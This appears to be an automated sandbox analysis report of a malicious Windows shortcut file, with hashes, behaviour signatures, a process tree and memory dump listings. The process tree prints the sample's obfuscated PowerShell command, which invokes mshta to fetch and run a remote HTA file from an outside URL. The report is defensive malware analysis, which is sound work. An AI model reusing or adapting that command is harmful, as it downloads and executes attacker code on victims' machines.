Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 02:13

General

  • Target

    eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk

  • Size

    1KB

  • MD5

    27251cc401cfe955c65b5512b5684f8b

  • SHA1

    80c817b04ae8a395d8f078bbf4e117895c13e6bd

  • SHA256

    eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765

  • SHA512

    c1ab81ca147a45d1d60008d3b1edb610552ebd60202a0f791352a139512fdae276b916c438254b48d72105ae061d98346f55c3c92866aa45c28483ca37f1717b

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\eddc294fc8599c7fccde15ac5516eb8fdab161aafe83e15a21dab41c98781765.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/swim.hta'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2696

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2696-38-0x000007FEF600E000-0x000007FEF600F000-memory.dmp
    Filesize

    4KB

  • memory/2696-39-0x000000001B590000-0x000000001B872000-memory.dmp
    Filesize

    2.9MB

  • memory/2696-41-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB

  • memory/2696-40-0x0000000001F60000-0x0000000001F68000-memory.dmp
    Filesize

    32KB

  • memory/2696-42-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB

  • memory/2696-43-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB

  • memory/2696-44-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB

  • memory/2696-45-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB

  • memory/2696-46-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp
    Filesize

    9.6MB